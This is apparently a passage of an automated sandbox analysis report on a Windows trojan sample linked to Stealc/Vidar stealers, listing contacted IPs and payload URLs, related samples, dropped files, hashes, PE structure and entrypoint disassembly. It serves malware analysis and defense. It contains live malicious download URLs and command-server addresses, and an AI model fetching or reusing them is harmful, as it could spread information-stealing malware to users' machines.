http://92.255.57.899	4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000909000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.89/697b92cb4e247842/sqlite3.dll3g	4CC1.tmp.exe, 00000003.00000002.1975546939.0000000000966000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exe	7gxaFDUSOD.exe, 7gxaFDUSOD.exe, 00000000.00000002.3887769418.0000000000A57000.00000004.00000020.00020000.00000000.sdmp, 7gxaFDUSOD.exe, 00000000.00000003.1505542790.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 7gxaFDUSOD.exe, 00000000.00000002.3887769418.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.56.70	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
92.255.57.89	unknown	Russian Federation	42253	TELSPRU	true
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572432
Start date and time:	2024-12-10 15:11:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	7gxaFDUSOD.exe renamed because original name is a hash value
Original Sample Name:	4c632322bff9d2562ebf7783cc411db8.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/6@1/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 52 Number of non-executed functions: 332
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 172.202.163.200, 40.126.53.8
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 7gxaFDUSOD.exe

Simulations

Behavior and APIs

Time	Type	Description
09:12:14	API Interceptor	8459338x Sleep call for process: 7gxaFDUSOD.exe modified
09:13:04	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.56.70	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse
	vwkb5DQRAL.exe	Get hash	malicious	Stealc, Vidar	Browse
	Tg3sk2wywR.exe	Get hash	malicious	Stealc	Browse
	x8AH98H0eQ.exe	Get hash	malicious	Stealc	Browse
	x8AH98H0eQ.exe	Get hash	malicious	Unknown	Browse
	zGHItMC5Zc.exe	Get hash	malicious	Stealc	Browse
	ozcAR7VO6Y.exe	Get hash	malicious	Stealc	Browse
	9gBcr7l7jT.exe	Get hash	malicious	Stealc	Browse
	Zbls3lMGhD.exe	Get hash	malicious	Stealc	Browse
	TP77MvSzt2.exe	Get hash	malicious	Stealc	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
post-to-me.com	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	104.21.56.70
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	vwkb5DQRAL.exe	Get hash	malicious	Stealc, Vidar	Browse	104.21.56.70
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse	172.67.179.207
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	0r9PL33C8E.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	Pw2KHOL9Z8.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	Tg3sk2wywR.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	x8AH98H0eQ.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	x8AH98H0eQ.exe	Get hash	malicious	Unknown	Browse	104.21.56.70

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ExternalREMITTANCE ACH SCHEDULED 1210241424bec0c449d38092c0dbd844252d73 (24.0 KB).msg	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://cgd-assinar.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	Product Blueprint..html	Get hash	malicious	HTMLPhisher	Browse	104.18.26.193
	New_Order_List.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Doc_13-35-42.js	Get hash	malicious	Unknown	Browse	104.21.96.35
	Doc_13-35-42.js	Get hash	malicious	Unknown	Browse	104.21.96.35
	Price Quotation-01.dqy.dll	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	ORDER-6070Y689_0PF57682456_DECVC789378909740.js	Get hash	malicious	WSHRat, Snake Keylogger	Browse	104.21.67.152
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	104.21.84.67
	https://t.ly/8cSDx	Get hash	malicious	Unknown	Browse	104.18.26.193
TELSPRU	https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9	Get hash	malicious	Unknown	Browse	92.255.57.144
	https://reviewgustereports.com/	Get hash	malicious	CAPTCHA Scam ClickFix, XWorm	Browse	92.255.57.155
	S1NrYNOYhZ.exe	Get hash	malicious	Stealc, Vidar	Browse	92.255.57.88
	S4h5LcSjJc.exe	Get hash	malicious	Stealc	Browse	92.255.57.88
	8z6iZ5YzKB.exe	Get hash	malicious	Stealc	Browse	92.255.57.88
	sXWh51zcTv.exe	Get hash	malicious	Stealc	Browse	92.255.57.88
	cTjQ45fs0O.exe	Get hash	malicious	Stealc, Vidar	Browse	92.255.57.88
	4kOYwbdq6Z.exe	Get hash	malicious	Stealc	Browse	92.255.57.88
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	92.255.57.88
SELECTELRU	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	45.89.231.211
	5EZLEXDveC.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	176.113.115.163
	teste.sh4.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	45.138.214.123
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	176.124.33.0
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.37
	442.docx.exe	Get hash	malicious	RMSRemoteAdmin	Browse	109.234.156.179
	442.docx.exe	Get hash	malicious	RMSRemoteAdmin	Browse	109.234.156.179
	nabppc.elf	Get hash	malicious	Unknown	Browse	85.119.147.53
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse	176.113.115.37
	vwkb5DQRAL.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.37

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	104.21.56.70
	FPqVs6et5F.exe	Get hash	malicious	Unknown	Browse	104.21.56.70
	c2.hta	Get hash	malicious	XWorm	Browse	104.21.56.70
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.56.70
	lFxGd66yDa.exe	Get hash	malicious	NetSupport RAT	Browse	104.21.56.70
	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	104.21.56.70
	n09qkE6r6n.lnk	Get hash	malicious	Unknown	Browse	104.21.56.70
	DqEJwd61Uw.exe	Get hash	malicious	Zhark RAT	Browse	104.21.56.70
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	104.21.56.70
	Revo.Uninstaller.Pro.v5.3.4.exe	Get hash	malicious	Unknown	Browse	104.21.56.70

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_4CC1.tmp.exe_abfcd7d98352ed9c28e265aaa3746af88ee33f8_44de372d_56aa0865-12d1-434f-954b-74e2efbed7e1\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9649625034064714
Encrypted:	false
SSDEEP:	192:0gtElpqcbo30FBRB69ajucZrP2izuiFXZ24IO88qC:LWdb7FBRBDjNFzuiFXY4IO8s
MD5:	BB6D5ACF5C0C675B8210F3FD5EA071DD
SHA1:	37A3EF76D98200C84BAE9A82BD8E2FDAA1D76974
SHA-256:	BB7FA0C83BDA1A7CDB389FBD9E435C6E8502589AE034FEF5D43CA913C53B1D6B
SHA-512:	943C4B6A9C00A3DB9C254381E0FBCC4C6EC86842ECEE06F28614A256850A91C00AB1025B3780A9E682F5790815C12E56499F00F5CEE00B862F0C9D7F1C1752A0
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.1.3.5.7.3.4.7.3.9.4.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.1.3.5.7.5.6.4.5.8.2.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.a.a.0.8.6.5.-.1.2.d.1.-.4.3.4.f.-.9.5.4.b.-.7.4.e.2.e.f.b.e.d.7.e.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.2.b.9.1.d.5.-.7.2.b.7.-.4.4.b.8.-.b.7.4.f.-.5.9.1.7.4.2.1.9.9.9.3.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.C.C.1...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.2.c.-.0.0.0.1.-.0.0.1.4.-.f.1.4.c.-.2.2.8.5.0.d.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.c.0.6.0.c.6.3.a.3.f.6.a.2.0.d.c.4.e.c.2.c.8.3.4.6.d.3.3.4.f.c.0.0.0.0.1.5.0.6.!.0.0.0.0.f.2.e.4.7.e.8.3.5.6.2.b.7.5.5.c.8.b.8.6.7.9.8.3.e.2.6.3.3.b.f.7.9.9.e.7.3.7.f.b.!.4.C.C.1...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB4D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Dec 10 14:12:54 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	62390
Entropy (8bit):	1.8107177976964546
Encrypted:	false
SSDEEP:	192:lQoDzXeiIvxeHXIkrGOIOJwAZ9UJ5KBz6gwHVafvWoz7rH0dzi7A9O91:+omiIvxezIEl9qws4xYpTQ1
MD5:	51FD3A251BE7F634CEB0D7648C2D5311
SHA1:	85E336DA29A79F22C44652B6BE11DB13F83BC9F9
SHA-256:	BBED8DD66D0C99365CC43C026246C55CA92FE2818E5B8B319C0E157E55020940
SHA-512:	27E8274BCC69A8B1E0A7F0BD192F4A965C67F7C54CE999A46C5D5BFD234D28D7F648B318E4D814792B7B7B814375E7F216E2814CFA673DDF25A07483479AE3F1
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......fLXg............4...............<.......t....*..........T.......8...........T............3..........................................................................................................eJ......H.......GenuineIntel............T.......,...ALXg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB262.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8322
Entropy (8bit):	3.695970504832011
Encrypted:	false
SSDEEP:	192:R6l7wVeJChk6k6Yz765gmf2zcspDG89baisfsi+m:R6lXJP6k6YP65gmfAcOahfsy
MD5:	C50FE6A05CC7D879D5F38D69828F85AE
SHA1:	2D4608361A8D0720AA4685703FCF030F49BD014E
SHA-256:	532FF44336B12F33786FF75107D18CC40BC54039EAD383DD5546219B5AA2F326
SHA-512:	9B7B48A5211E36EE259C33838402D8987B55917EF15C3BE7CE68BEF6015EF3AAE7B5A0719AB8775550A48F3D02BD0AEA4516E8907072A1AE946992F72B7C25BD
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2C1.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4575
Entropy (8bit):	4.451984127004279
Encrypted:	false
SSDEEP:	48:cvIwWl8zsfNJg77aI95j2WpW8VYq+Ym8M4JNeFaPxJ+q81lT7zK9d:uIjffnI7HjX7VJ3JtyT7zK9d
MD5:	C9123C82600505F3B4C8A55D8AFC4E2B
SHA1:	879A20A6A72538EADEDC77909BBA941D01D71DCE
SHA-256:	EA13A0CA3D9F581D52DF668243C06376BFBB2485B09102E26A3163FF272B9378
SHA-512:	F52904F9E47ADA87D71D4E816CE6F5C90F1AB6323069638FF186008542F7AB4F548B2ED0F97778FDBD908C7AF5BD7134EA4BE28D07CF1CC984D32AF1F436710D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625275" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Download File

Process:	C:\Users\user\Desktop\7gxaFDUSOD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	303616
Entropy (8bit):	6.254219834244974
Encrypted:	false
SSDEEP:	3072:xF7ZPrB7b0RmL9S9y5FIgaAGw+hpQ443mI8OdsbwFy4lUcyMc4sglLVlR97hgkwg:775ms9S9y5OaGVq4A8O+B4SRMqofhf
MD5:	D8CE5C15818144C17BBB3BF250494439
SHA1:	F2E47E83562B755C8B867983E2633BF799E737FB
SHA-256:	351B08447B3AC2527AB994604BDD91E43044C962DC26DE2AD12F2C46D1EACABD
SHA-512:	05BAEF07C671CB86C524C55B7CB5A710C92CA864447E2BF8F4044AD73A1C56C4CBEE4D574FAF6296B04D4981238A2E0C881DE1D316047019FFC7D870BFE650AC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L......e......................?...................@.......................... B.............................................D(..<.....A.................................................................................d............................text............................... ..`.rdata..l ......."..................@..@.data....=..@...l..................@....rsrc.........A.....................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.372086579676029
Encrypted:	false
SSDEEP:	6144:MFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNdiL:8V1QyWWI/glMM6kF7fq
MD5:	8F3D7255EE872D6112578C2FC4006A90
SHA1:	B119C5C46E52F46C57443DEBE05A066DDA59B9F5
SHA-256:	1740A2C852FEE121BB6A9782705055E2F1E4AE7E2DEC44B9F4FA0347CC9A6A84
SHA-512:	50CBF17A9C9681A312E3F35F8118A785E003BB8CE78DA2491C17E0F97E53E30F9DD4E84BBF81349EAB5AF65ED44E76813F570A229323625A8C886510ED81CA41
Malicious:	false
Reputation:	low
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm&s=..K...............................................................................................................................................................................................................................................................................................................................................b*.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.968890413602721
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	7gxaFDUSOD.exe
File size:	429'568 bytes
MD5:	4c632322bff9d2562ebf7783cc411db8
SHA1:	f9a82d6aa7867b3e55907c8976ecdc564195ae8d
SHA256:	4adede428b6bdfba962baae89274a4697e33f70fa4ee9265f2d945e83e408265
SHA512:	f457d70ce849bd115c3e966f3460899cd84e8d062b0b68d33d47b536268972b977b155da017b8a3667d21cdc4eafeceb0ee1ba7693ebd18d66562883a36375d5
SSDEEP:	6144:tm2uj3DmwiSj+Q/g2ygrx2h0jyG0clDM6oMYYub9hjD68u3h:cFL/9x2heyGdl997ub3+8u3
TLSH:	7B94DF2070E1D921EEF687351974E2A46A7BFC226B72419F7594B79F2E332D1CA61303
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yg....{...{...{..T....{..T....{..T..E.{.:.....{...z.t.{..T....{..T....{..T....{.Rich..{.........................PE..L...a..d...

File Icon


Icon Hash:	06c7c30b0f4e0d19

Static PE Info

General

Entrypoint:	0x4013de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64DF1E61 [Fri Aug 18 07:31:45 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	33611fc8206bc18868eb70090e1d404f

Entrypoint Preview

Instruction
call 00007FBD915477C2h
jmp 00007FBD91544CEDh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00454898h], eax
mov dword ptr [00454894h], ecx
mov dword ptr [00454890h], edx
mov dword ptr [0045488Ch], ebx
mov dword ptr [00454888h], esi
mov dword ptr [00454884h], edi
mov word ptr [004548B0h], ss
mov word ptr [004548A4h], cs
mov word ptr [00454880h], ds
mov word ptr [0045487Ch], es
mov word ptr [00454878h], fs
mov word ptr [00454874h], gs
pushfd
pop dword ptr [004548A8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0045489Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004548A0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004548ACh], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004547E8h], 00010001h
mov eax, dword ptr [004548A0h]
mov dword ptr [0045479Ch], eax
mov dword ptr [00454790h], C0000409h
mov dword ptr [00454794h], 00000001h
mov eax, dword ptr [00452004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00452008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000B0h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x50844	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42e000	0x11cd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x50510	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4f000	0x164	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4dc7c	0x4de00	9ce78b5298102c51a5eaa50e6ea5c696	False	0.8521926414526485	data	7.5518716228789815	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4f000	0x2074	0x2200	ebb8187c49cd59597a20938db2a586dd	False	0.36075367647058826	data	5.422766049852953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x52000	0x3db0f8	0x6c00	25558f90cad9d8abf2ad444dbd659340	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x42e000	0x11cd0	0x11e00	43b2716187b6f12d432535208d998f43	False	0.5203234265734266	data	5.481967678806491	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x4391a8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x4392d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x43b8a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_ICON	0x42e6f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Syriac	Syriac	0.36353944562899787
RT_ICON	0x42f598	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Syriac	Syriac	0.5094765342960289
RT_ICON	0x42fe40	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Syriac	Syriac	0.591589861751152
RT_ICON	0x430508	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Syriac	Syriac	0.6163294797687862
RT_ICON	0x430a70	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Syriac	Syriac	0.3578799249530957
RT_ICON	0x431b18	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Syriac	Syriac	0.35081967213114756
RT_ICON	0x4324a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Syriac	Syriac	0.40425531914893614
RT_ICON	0x432970	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Syriac	Syriac	0.8328891257995735
RT_ICON	0x433818	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Syriac	Syriac	0.8524368231046932
RT_ICON	0x4340c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Syriac	Syriac	0.7903225806451613
RT_ICON	0x434788	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Syriac	Syriac	0.8020231213872833
RT_ICON	0x434cf0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Syriac	Syriac	0.8058091286307054
RT_ICON	0x437298	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Syriac	Syriac	0.8327861163227017
RT_ICON	0x438340	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Syriac	Syriac	0.8426229508196721
RT_ICON	0x438cc8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Syriac	Syriac	0.8617021276595744
RT_DIALOG	0x43c920	0x84	data			0.7651515151515151
RT_STRING	0x43c9a8	0x2f4	data			0.4894179894179894
RT_STRING	0x43cca0	0xde	data			0.5585585585585585
RT_STRING	0x43cd80	0x708	data			0.4261111111111111
RT_STRING	0x43d488	0x6bc	data			0.4361948955916473
RT_STRING	0x43db48	0x808	data			0.4173151750972763
RT_STRING	0x43e350	0x512	data			0.44684129429892144
RT_STRING	0x43e868	0x78a	data			0.42383419689119173
RT_STRING	0x43eff8	0x5b4	data			0.44931506849315067
RT_STRING	0x43f5b0	0x71c	data			0.4269230769230769
RT_GROUP_CURSOR	0x43b880	0x22	data			1.088235294117647
RT_GROUP_CURSOR	0x43c750	0x14	data			1.25
RT_GROUP_ICON	0x439130	0x76	data	Syriac	Syriac	0.6779661016949152
RT_GROUP_ICON	0x432908	0x68	data	Syriac	Syriac	0.7115384615384616
RT_VERSION	0x43c768	0x1b8	COM executable for DOS			0.5681818181818182

Imports

DLL

Import

KERNEL32.dll

